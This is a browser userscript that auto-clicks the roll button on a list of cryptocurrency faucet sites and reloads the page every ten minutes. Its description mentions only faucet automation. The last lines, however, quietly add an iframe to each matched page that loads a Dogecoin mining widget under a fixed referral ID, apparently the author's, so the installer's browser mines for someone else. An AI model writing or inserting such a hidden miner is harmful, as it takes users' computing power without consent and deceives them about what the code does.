// ==UserScript== // @name Free multicrypto Auto Faucet // @description Auto Faucet Script by CodeFred // @author CodeFred // @version 1.3 // @namespace mailto:tmtm@outlook.be // @match https://freebitcoin.io/* // @match https://freenem.com/* // @match https://coinfaucet.io/* // @match https://freecardano.com/* // @match https://freesteam.io/* // @match https://freetether.com/* // @match https://free-ltc.com/* // @match https://freeusdcoin.com/* // @match https://freeneo.io/* // @match https://freebinancecoin.com/* // @match https://free-tron.com/* // @match https://freebinancecoin.com/* // @match https://freeethereum.com/* // @match https://freedash.io/* // @grant GM_setValue // @grant GM_getValue // @downloadURL none // ==/UserScript== setTimeout(function() { 'use strict'; console.log(document.querySelector("div[class='roll-wrapper']").style.display !== 'none'); if (document.querySelector("div[class='roll-wrapper']").style.display !== "none") { document.querySelector("button[class='main-button-2 roll-button bg-2']").click() } //every 10 minutes the page will be refreshed to check if you can roll again setTimeout(function(){ location.reload(); }, 10*60*1000); },2000); var iframe2 = document.createElement('iframe'); iframe2.src="https://coinpot.co/mine/dogecoin/?ref=C965E7BC7B07&mode=widget"; iframe2.style="overflow:hidden;width:324px;height:470px;"; document.body.appendChild(iframe2);